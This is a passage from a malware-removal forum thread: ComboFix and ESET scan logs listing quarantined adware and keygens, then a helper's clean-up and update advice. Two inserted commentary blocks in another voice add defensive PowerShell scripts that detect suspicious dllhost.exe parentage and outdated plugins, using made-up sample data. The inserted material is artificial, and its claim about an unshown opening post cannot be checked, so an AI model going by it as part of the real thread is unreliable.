[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000\RemoteAccess\Profile\[&^ޏc *2*]
"AutoConnect"=dword:00000000
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000\RemoteAccess\Profile\[&^ޏc *3*]
"AutoConnect"=dword:00000000
"EnableAutodisconnect"=dword:00000000
"EnableExitDisconnect"=dword:00000000
"DisconnectIdleTime"=dword:00000014
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000\RemoteAccess\Profile\[&^ޏc *4*]
"AutoConnect"=dword:00000000
"EnableAutodisconnect"=dword:00000001
"EnableExitDisconnect"=dword:00000001
"DisconnectIdleTime"=dword:00000014
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\Applications\YoukuDesktop.exe\shell\O(uOw[7bz *Sb*_\command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|explorer|%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\BitTorrent\Shell\O(uQ*Q*eΘSb*_B*T*eN(*&*Q*)*\Command]
@="\"q:\\Program Files\\Tencent\\QQDownload\\QQDownload.exe\" /BT=\"%1\""
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-232748)
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.3GP\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.ASF\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.AVI\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.DAT\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.DV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.DVIX\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.FLV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.kux\Shell\O(uOw[7bz *Sb*_\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|explorer|%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.M4V\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MKV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MOV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MP4\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MPEG\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MPG\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.RM\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.RMVB\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.WMV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet006\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'Explorer.exe'(2436)
c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
c:\users\Public\Thunder Network\KanKan\reghelper\xappex.1.1.1.73.(426).dll
c:\users\Public\Thunder Network\KanKan\Pusher\xappdrv.1.0.0.73.dll
c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
c:\program files\QMovie\QVODShellIcon.dll
c:\program files\ThinkPad\Bluetooth Software\btncopy.dll
q:\program files\Nokia\Nokia PC Suite 7\PhoneBrowser.dll
q:\program files\Nokia\Nokia PC Suite 7\NGSCM.DLL
q:\program files\Nokia\Nokia PC Suite 7\Lang\PhoneBrowser_chi-sc.nlr
q:\program files\Nokia\Nokia PC Suite 7\Resource\PhoneBrowser_Nokia.ngr
c:\program files\Lenovo\Drag-to-Disc\Shellex.dll
c:\windows\system32\DLAAPI_W.DLL
c:\program files\Lenovo\Drag-to-Disc\ShellRes.dll
.
------------------------ Other Running Processes ------------------------
.
c:\windows\system32\wbem\unsecapp.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\users\THINK\Desktop\procexp_V15.40.0.0.4202571463.exe
.
**************************************************************************
.
Completion time: 2014-09-14  16:29:48 -
ComboFix-quarantined-files.txt  2014-09-14 20:29
.
Pre-Run: 6,489,427,968 bytes free
Post-Run: 6,207,209,472 bytes free
.
- - End Of File - - D9FB0EC6979142C0DD2CC2D175874FAC
5C616939100B85E558DA92B899A0FC36
 
========= End of CMD: =========
 
EmptyTemp: => Removed 285.8 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====
 
 
log.txt:
 
 
ESETSmartInstaller@High as downloader log:
all ok
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=fcb1938c3a1b65419dddc7b2865f6992
# engine=20160
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-15 03:24:48
# local_time=2014-09-15 11:24:48 )
# country="People's Republic of China"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1=''
# compatibility_mode=5892 16776574 100 100 3080813 247402190 0 0
# scanned=550426
# found=15
# cleaned=14
# scan_time=11092
sh=566A8CD382F9397B07F6B28A6DD2DD6992410A02 ft=0 fh=0000000000000000 vn="Win32/Packed.Autoit.C.Gen potentially unwanted application" ac=I fn="C:\Users\All Users\VistaCodecs\{C02461FA-CBA3-4886-B3C3-BDD45D05B3C3}\Vista Codec Package.msi"
sh=71435DDB11E00D0243380C4902324853FE4ECE8F ft=1 fh=12b0cd2dde452d65 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\apnic.dll"
sh=FFA8B6510D624A55F3EB7FFD6D5221A44944681C ft=1 fh=3386eb0d6ed0e5e1 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\apnstub.exe"
sh=1A3F14C0A66F9AF050D1F34FBACBAADC31751A07 ft=1 fh=2704a03a0f47b728 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\apntoolbarinstaller.exe"
sh=FD0483A45EF23EB4DEF1523906A28A4A5D3C0D77 ft=1 fh=fcf2e467b851cbbd vn="a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\Offercast_AVIRAV7_.exe"
sh=566A8CD382F9397B07F6B28A6DD2DD6992410A02 ft=0 fh=0000000000000000 vn="Win32/Packed.Autoit.C.Gen potentially unwanted application (deleted - quarantined)" ac=C fn="C:\ProgramData\VistaCodecs\{C02461FA-CBA3-4886-B3C3-BDD45D05B3C3}\Vista Codec Package.msi"
sh=B640049FEE63BF85D574F67D798B5FACFD03FE1E ft=0 fh=0000000000000000 vn="a variant of Android/SystemMonitor.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\Users\Public\QiYi\QiyiClient\apk\0\qiyi.407.apk"
sh=A3C199CE086BA2E1585022F2C2FD28B275C482D6 ft=0 fh=0000000000000000 vn="a variant of Android/SystemMonitor.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\Users\Public\QiYi\QiyiClient\apk\1\qiyi81.apk"
sh=F6DA94FBB24C2795F7CA6F3669F7B26133BC05C5 ft=0 fh=0000000000000000 vn="Win32/Toolbar.Conduit potentially unwanted application (deleted - quarantined)" ac=C fn="F:\Hero Fighter\HeroFighterToolbar.xpi"
sh=30308D6B5ED151C478D914AA7FC0BA4DB9E09096 ft=0 fh=0000000000000000 vn="a variant of Win32/Keygen.HA potentially unsafe application (deleted - quarantined)" ac=C fn="G:\ONONE_PERFECT_PHOTO_SUITE_PREMIUM_ED_V7.5.0-XFORCE.zip"
sh=7DE60A3AEAC96F7FA559D468D852FBDDA731391F ft=1 fh=3d20769bd48072ca vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\ApnIC.dll"
sh=DBA4D7540C69C6492D48E688A00B51387685F8A6 ft=1 fh=fb092140bceb8039 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\ApnStub.exe"
sh=140308EF85F243BA4D2AAC012B1017B47E52B89E ft=1 fh=ffd7fdcd47cd63f7 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\ApnToolbarInstaller.exe"
sh=44554E882D1DD6FBF71B6550B0687E3D9FD73711 ft=1 fh=b0638f029680e22d vn="a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\AskPIP_FF_.exe"
sh=21901D59A0EB32C194F8F71E98F22A0FF3CE04DE ft=1 fh=8f287399d4deb8fc vn="a variant of Win32/Keygen.AG potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\IDM Computer Solutions\UltraEdit-32\KeyGen.exe"
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=fcb1938c3a1b65419dddc7b2865f6992
# engine=20169
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-16 01:43:40
# local_time=2014-09-15 09:43:40 )
# country="People's Republic of China"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1=''
# compatibility_mode=5892 16776574 100 100 3117945 247439322 0 0
# scanned=508454
# found=0
# cleaned=0
# scan_time=11607
 
 
and FRST.txt is in the attachment (FRST.txt, 64.85 KB).
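The ComboFix log above still lists seven dllhost.exe instances under "Other Running Processes", and the opening post traced them in Process Explorer to the chain svchost.exe (DcomLaunch) > rundll32.exe > powershell.exe > dllhost.exe. A legitimate COM Surrogate (dllhost.exe) is started by the DcomLaunch svchost.exe, so a dllhost.exe with powershell.exe anywhere in its ancestry is the thing to look for. The script below is an added example, not part of the thread or of any of the tools used in it: it walks each process's parent chain from a Win32_Process-shaped table and reports the dllhost.exe instances whose ancestors include powershell.exe. The sample table and its PIDs are constructed to mirror the reported chain; the function names are my own, and the `[pscustomobject]@{}` syntax assumes PowerShell 3.0 or later.

```powershell
# Added example (not from the thread): flag dllhost.exe processes whose parent
# chain contains powershell.exe, the pattern the thread opener saw in Process
# Explorer. Function names and the sample PIDs below are assumptions.

function Get-AncestorChain {
    # Returns the names of the ancestors of $ProcessId, nearest parent first.
    # $Table holds objects with ProcessId, ParentProcessId and Name, i.e. the
    # shape of Win32_Process, so the same function works on live WMI data.
    param([int]$ProcessId, [object[]]$Table)
    $byId = @{}
    foreach ($p in $Table) { $byId[[int]$p.ProcessId] = $p }
    $chain = @()
    $seen  = @{}   # guards against PID cycles (e.g. a process whose parent PID was recycled)
    $cur   = $byId[$ProcessId]
    while ($cur -and -not $seen.ContainsKey([int]$cur.ProcessId)) {
        $seen[[int]$cur.ProcessId] = $true
        $parent = $byId[[int]$cur.ParentProcessId]
        if (-not $parent) { break }       # parent exited or is not in the table
        $chain += $parent.Name
        $cur = $parent
    }
    return ,$chain
}

function Find-SuspiciousDllhost {
    # Emits one record per dllhost.exe whose ancestry contains powershell.exe.
    param([object[]]$Table)
    foreach ($p in ($Table | Where-Object { $_.Name -ieq 'dllhost.exe' })) {
        $chain = Get-AncestorChain -ProcessId $p.ProcessId -Table $Table
        if ($chain -icontains 'powershell.exe') {
            [pscustomobject]@{
                ProcessId = $p.ProcessId
                Ancestry  = (@($p.Name) + $chain) -join ' <- '
            }
        }
    }
}

# Constructed sample mirroring the chain reported in the thread; PIDs are made up.
$sample = @(
    [pscustomobject]@{ ProcessId = 4;    ParentProcessId = 0;    Name = 'System' }
    [pscustomobject]@{ ProcessId = 600;  ParentProcessId = 4;    Name = 'services.exe' }
    [pscustomobject]@{ ProcessId = 700;  ParentProcessId = 600;  Name = 'svchost.exe' }    # -k DcomLaunch
    [pscustomobject]@{ ProcessId = 1500; ParentProcessId = 700;  Name = 'rundll32.exe' }
    [pscustomobject]@{ ProcessId = 1600; ParentProcessId = 1500; Name = 'powershell.exe' }
    [pscustomobject]@{ ProcessId = 1700; ParentProcessId = 1600; Name = 'dllhost.exe' }
    [pscustomobject]@{ ProcessId = 1800; ParentProcessId = 1700; Name = 'dllhost.exe' }    # spawned by the first one
    [pscustomobject]@{ ProcessId = 1900; ParentProcessId = 700;  Name = 'dllhost.exe' }    # ordinary COM Surrogate
)

Find-SuspiciousDllhost -Table $sample | Format-Table -AutoSize

# Live check on the machine under investigation (Get-WmiObject is available on
# Windows Vista's PowerShell; Get-CimInstance works the same on newer versions):
# $live = Get-WmiObject Win32_Process | Select-Object ProcessId, ParentProcessId, Name
# Find-SuspiciousDllhost -Table $live | Format-Table -AutoSize
```

In the sample, the dllhost.exe parented directly by the DcomLaunch svchost.exe is left out and only the two under powershell.exe are reported. One caveat for live use: ParentProcessId is just a number, and once the real parent has exited Windows can hand that PID to an unrelated process, so confirm a suspicious chain against Win32_Process.CreationDate (a parent must be older than its child) or against Process Explorer's tree before acting on it.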
 
 
 
 


#6 aharonov (Malware Response Team, 2,441 posts)

Posted 16 September 2014 - 06:44 AM

Ok, it's looking good now.

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe to Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden, so don't end up with a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run.
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. the browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up to date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Flash Player 14 Plugin
Java™ 7




Tips

I recommend reading and following the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.
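aharonov's "Closing security holes" step names two outdated packages, Adobe Flash Player 14 Plugin and Java 7, and asks that all old versions be removed before installing the current one. The script below is an added example, not part of the thread: it reads the Uninstall registry keys (native, WOW6432Node and per-user views) and lists every Flash Player and Java entry with its DisplayVersion, so side-by-side leftovers are visible before and after the update. The function names, the name-matching pattern and the sample entries (including their version strings) are my assumptions; Google Chrome 36.0.1985.125 is the version that appears in the ComboFix log above and is included only as a non-matching entry.

```powershell
# Added example (not from the thread): inventory installed Flash Player and
# Java versions from the Uninstall registry keys. Function names, the regex
# and the sample entries are assumptions made for illustration.

function Get-UninstallEntries {
    # Collects DisplayName/DisplayVersion/UninstallString from every Uninstall
    # subkey. The WOW6432Node view only exists on 64-bit Windows; per-user
    # installs (e.g. Chrome, Google Update) live under HKCU.
    $roots = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
    )
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($key in (Get-ChildItem $root -ErrorAction SilentlyContinue)) {
            $v = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            if ($v -and $v.DisplayName) {
                [pscustomobject]@{
                    DisplayName     = [string]$v.DisplayName
                    DisplayVersion  = [string]$v.DisplayVersion
                    UninstallString = [string]$v.UninstallString
                }
            }
        }
    }
}

function Find-PluginInstalls {
    # Keeps only Flash Player and Java entries (assumed naming pattern: Java
    # shows up as "Java 7 Update NN" or "Java(TM) 7 ..." in the Uninstall list)
    # and sorts them so several versions of one product sit next to each other.
    param(
        [object[]]$Entries,
        [string]$Pattern = '^(Adobe Flash Player|Java(\(TM\))?\s)'
    )
    $Entries |
        Where-Object { $_.DisplayName -match $Pattern } |
        Sort-Object DisplayName, DisplayVersion
}

# Constructed sample: product names follow the post, version strings are made up.
$sample = @(
    [pscustomobject]@{ DisplayName = 'Adobe Flash Player 14 Plugin'; DisplayVersion = '14.0.0.0';       UninstallString = '' }
    [pscustomobject]@{ DisplayName = 'Java 7 Update 1';              DisplayVersion = '7.0.10';         UninstallString = '' }
    [pscustomobject]@{ DisplayName = 'Google Chrome';                DisplayVersion = '36.0.1985.125';  UninstallString = '' }
)

Find-PluginInstalls -Entries $sample | Format-Table DisplayName, DisplayVersion -AutoSize

# On the real machine, include the UninstallString so each stale version can be removed:
# Find-PluginInstalls -Entries (Get-UninstallEntries) |
#     Format-Table DisplayName, DisplayVersion, UninstallString -AutoSize
```

Run it once before updating to see what is installed, and again afterwards: the goal is one current entry per product, with no older Flash Player or Java entry left beside it. The Uninstall keys only record what installers registered, so a browser plugin dropped outside an installer will not show up here; the browser's own plugin page is the second place to check.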

#7 firzenj (Topic Starter, Members, 6 posts)

Posted 16 September 2014 - 12:32 PM

Yes, I have done what you advised.

 

Thanks for your help again!



#8 aharonov (Malware Response Team, 2,441 posts)

Posted 16 September 2014 - 12:50 PM

You're very welcome.
All the best.

#9 aharonov (Malware Response Team, 2,441 posts)

Posted 16 September 2014 - 12:50 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.



